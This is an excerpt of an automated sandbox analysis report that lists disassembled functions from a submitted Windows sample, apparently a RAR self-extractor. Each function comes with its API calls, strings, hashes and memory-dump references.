                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                                                          • String ID: LICENSEDLG
                                                                                                                                                                          • API String ID: 3214253823-2177901306
                                                                                                                                                                          • Opcode ID: ca78af5c403951258ae98a6065028124be4640c37a77049d98af175c7b71ab29
                                                                                                                                                                          • Instruction ID: 14324f54fa58c5d331df1df22b7344086375966e693834b6a4ae0086e7ee9e0b
                                                                                                                                                                          • Opcode Fuzzy Hash: ca78af5c403951258ae98a6065028124be4640c37a77049d98af175c7b71ab29
                                                                                                                                                                          • Instruction Fuzzy Hash: 7221B132204205BBD6119B75EC4AF3B7BEDEB4AF41F110058F604A70E5DF629A41D735
                                                                                                                                                                          Function 00B3FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,89560082,00000001,00000000,00000000,?,?,00B2AF6C,ROOT\CIMV2), ref: 00B3FD99
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00B2AF6C,ROOT\CIMV2), ref: 00B3FE14
                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00B3FE1F
                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 00B3FE48
                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 00B3FE52
                                                                                                                                                                          • GetLastError.KERNEL32(80070057,89560082,00000001,00000000,00000000,?,?,00B2AF6C,ROOT\CIMV2), ref: 00B3FE57
                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 00B3FE6A
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,?,00B2AF6C,ROOT\CIMV2), ref: 00B3FE80
                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 00B3FE93
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1353541977-0
                                                                                                                                                                          • Opcode ID: 8a18e2e45733be2dc6e58669483319094961ca1a3456ae59c3ca2e921974c59b
                                                                                                                                                                          • Instruction ID: a41f89e3c70897cb63a5f8f8a60bdd69fb617e07b21a85599419ac8eb1607718
                                                                                                                                                                          • Opcode Fuzzy Hash: 8a18e2e45733be2dc6e58669483319094961ca1a3456ae59c3ca2e921974c59b
                                                                                                                                                                          • Instruction Fuzzy Hash: 4141E971E40316ABCB109F64CC45BBFBBE8EB48B51F2442B9F915E72A1DB34990087A5
                                                                                                                                                                          Function 00B2AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                                                          • API String ID: 3519838083-3505469590
                                                                                                                                                                          • Opcode ID: 31a8333fd9b3e27c81762fb7f1a82dcc122a642f4114650fb6899a8ae77fe45e
                                                                                                                                                                          • Instruction ID: 35b997ceea027034ed8a750c909140e606c06a769681be9f146053338d41a20e
                                                                                                                                                                          • Opcode Fuzzy Hash: 31a8333fd9b3e27c81762fb7f1a82dcc122a642f4114650fb6899a8ae77fe45e
                                                                                                                                                                          • Instruction Fuzzy Hash: 57716B71A00629AFDB15DFA4DC95EAFB7F8FF48751B140199E516E72A0CB30AD01CB60
                                                                                                                                                                          Function 00B29382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B29387
                                                                                                                                                                          • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00B293AA
                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00B293C9
                                                                                                                                                                            • Part of subcall function 00B2C29A: _wcslen.LIBCMT ref: 00B2C2A2
                                                                                                                                                                            • Part of subcall function 00B31FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B2C116,00000000,.exe,?,?,00000800,?,?,?,00B38E3C), ref: 00B31FD1
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B29465
                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00B294D4
                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00B29514
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                          • String ID: rtmp%d
                                                                                                                                                                          • API String ID: 3726343395-3303766350
                                                                                                                                                                          • Opcode ID: eaef10b85e5bc5d26c6ef6dc6da658f1996cff1bcb3d893ecc0f43d7fba54d25
                                                                                                                                                                          • Instruction ID: 864d82b1045e8203ae27cce55c583d96ba62875d137d5415922f353088f33562
                                                                                                                                                                          • Opcode Fuzzy Hash: eaef10b85e5bc5d26c6ef6dc6da658f1996cff1bcb3d893ecc0f43d7fba54d25
                                                                                                                                                                          • Instruction Fuzzy Hash: BE415171900378A6DF21ABA0EC55ADE73FCEF55740F1448E5B64DE3151EA388B898B60
                                                                                                                                                                          Function 00B31218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00B3122E
                                                                                                                                                                            • Part of subcall function 00B2B146: GetVersionExW.KERNEL32(?), ref: 00B2B16B
                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00B31251
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00B31263
                                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B31274
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B31284
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B31294
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00B312CF
                                                                                                                                                                          • __aullrem.LIBCMT ref: 00B31379
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1247370737-0
                                                                                                                                                                          • Opcode ID: 182a73b9ce78ebc51d21a5ce65a888476b19de6b46ea7c5b86e832668a29bbf8
                                                                                                                                                                          • Instruction ID: 775cd48046865396dc1398e56ac55de43d38203cc3512cca9e57ac955593418e
                                                                                                                                                                          • Opcode Fuzzy Hash: 182a73b9ce78ebc51d21a5ce65a888476b19de6b46ea7c5b86e832668a29bbf8
                                                                                                                                                                          • Instruction Fuzzy Hash: 0E4115B2508305AFC710DF69C884A6BBBE9FB88715F10896EF596D2210E734E649CB52
                                                                                                                                                                          Function 00B22210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B22536
                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                            • Part of subcall function 00B305DA: _wcslen.LIBCMT ref: 00B305E0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                          • String ID: ;%u$x%u$xc%u
                                                                                                                                                                          • API String ID: 3053425827-2277559157
                                                                                                                                                                          • Opcode ID: 87c04403336bbaeff9ec7ab764c9f741142d53e749fad501977522905d5bcee5
                                                                                                                                                                          • Instruction ID: 3af569294640340d2ef8f94c169ac639f8494c6f24d750e26b9c3ff32c798612
                                                                                                                                                                          • Opcode Fuzzy Hash: 87c04403336bbaeff9ec7ab764c9f741142d53e749fad501977522905d5bcee5
                                                                                                                                                                          • Instruction Fuzzy Hash: D6F13971604350ABCB25EB24A4957BE77D9AF94300F0805EDFD8DDF283CB648945C7A2
                                                                                                                                                                          Function 00B39CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                                                                          • API String ID: 176396367-3568243669
                                                                                                                                                                          • Opcode ID: 2ef7b69ad7057d68aec21c5c3dc74ecaa8d092f1a235c7e5620156afcd576f1d
                                                                                                                                                                          • Instruction ID: bbae10f26dbb199ce0ad739add36b1c535389af80238d7ba6608304d0b8572ec
                                                                                                                                                                          • Opcode Fuzzy Hash: 2ef7b69ad7057d68aec21c5c3dc74ecaa8d092f1a235c7e5620156afcd576f1d
                                                                                                                                                                          • Instruction Fuzzy Hash: A851156A74432395DB30AA299C1277673E4DFA1750F7808EAFDC18B2C0FBE58D858261
                                                                                                                                                                          Function 00B4F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00B4FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00B4F6CF
                                                                                                                                                                          • __fassign.LIBCMT ref: 00B4F74A
                                                                                                                                                                          • __fassign.LIBCMT ref: 00B4F765
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00B4F78B
                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,00B4FE02,00000000,?,?,?,?,?,?,?,?,?,00B4FE02,00000000), ref: 00B4F7AA
                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000001,00B4FE02,00000000,?,?,?,?,?,?,?,?,?,00B4FE02,00000000), ref: 00B4F7E3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                          • Opcode ID: 1433b4166c537bf7d841602918e80b98309421ce36ddec246bd99b749cb0b245
                                                                                                                                                                          • Instruction ID: 51969f88ba2e929927249e924c82c140a5ecba70a4005d274a01e9cc957f4599
                                                                                                                                                                          • Opcode Fuzzy Hash: 1433b4166c537bf7d841602918e80b98309421ce36ddec246bd99b749cb0b245
                                                                                                                                                                          • Instruction Fuzzy Hash: F451A5B1D0024A9FDB10CFA8DC85BEEBBF4EF09710F1541AAE555E7291D730AA41CBA1
                                                                                                                                                                          Function 00B42900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00B42937
                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00B4293F
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00B429C8
                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00B429F3
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00B42A48
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                          • String ID: csm
                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                          • Opcode ID: bb77dca70d571cfc9e7fece9ad743c4a7377cae7787edc086e1095c18bcfca0c
                                                                                                                                                                          • Instruction ID: e679666a007172c938e985107dab53b41a7084b1b178b36521993be4fea3b1dd
                                                                                                                                                                          • Opcode Fuzzy Hash: bb77dca70d571cfc9e7fece9ad743c4a7377cae7787edc086e1095c18bcfca0c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4E418E34A00208ABCF10DF68C885AAEBBF5EF45324F5481E5FC15AB392D7719B45EB91
                                                                                                                                                                          Function 00B39ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00B39EEE
                                                                                                                                                                          • GetWindowRect.USER32(?,00000000), ref: 00B39F44
                                                                                                                                                                          • ShowWindow.USER32(?,00000005,00000000), ref: 00B39FDB
                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00B39FE3
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00B39FF9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Show$RectText
                                                                                                                                                                          • String ID: RarHtmlClassName
                                                                                                                                                                          • API String ID: 3937224194-1658105358
                                                                                                                                                                          • Opcode ID: 1c349a65daeab9b66bf1dbf92b578efd0d398d7987df79eeb0515f8eda45e126
                                                                                                                                                                          • Instruction ID: cb5979fb7ce697b3c88ef4b71624d3fa0d2a3907e5d814424025ef511611c3ef
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c349a65daeab9b66bf1dbf92b578efd0d398d7987df79eeb0515f8eda45e126
                                                                                                                                                                          • Instruction Fuzzy Hash: 5D41A331004210AFD721AF64DC8CB5B7BE8FF48F01F204599F845AA166DB74EA44CB62
                                                                                                                                                                          Function 00B39955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                                          • API String ID: 176396367-3743748572
                                                                                                                                                                          • Opcode ID: 7f3f88c5e87dda9bdcd2fc29d9ebd8509295ade2cd802c4ca3ccc31d785e8ddc
                                                                                                                                                                          • Instruction ID: 748d67567e79be3dce71470d99ef48db5e267af068b435734267923f7c88de44
                                                                                                                                                                          • Opcode Fuzzy Hash: 7f3f88c5e87dda9bdcd2fc29d9ebd8509295ade2cd802c4ca3ccc31d785e8ddc
                                                                                                                                                                          • Instruction Fuzzy Hash: 6A31523264434556DA30AB549C82B7B73E4EB50720F70469FF886573C0FBE0AE8583A1
                                                                                                                                                                          Function 00B4C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B4C868: _free.LIBCMT ref: 00B4C891
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C8F2
                                                                                                                                                                            • Part of subcall function 00B48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?), ref: 00B48DE2
                                                                                                                                                                            • Part of subcall function 00B48DCC: GetLastError.KERNEL32(?,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?,?), ref: 00B48DF4
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C8FD
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C908
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C95C
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C967
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C972
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C97D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                                          • Instruction ID: 04d92524d7c417209d836157291f8b54f804460d4be9c98bd6a73ddfd8ac68cd
                                                                                                                                                                          • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                                          • Instruction Fuzzy Hash: B9111F71A82B08AAE561B7B5CC07FDB7FEC9F04F00F404C69B29D66092DA65B605A750
                                                                                                                                                                          Function 00B3E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
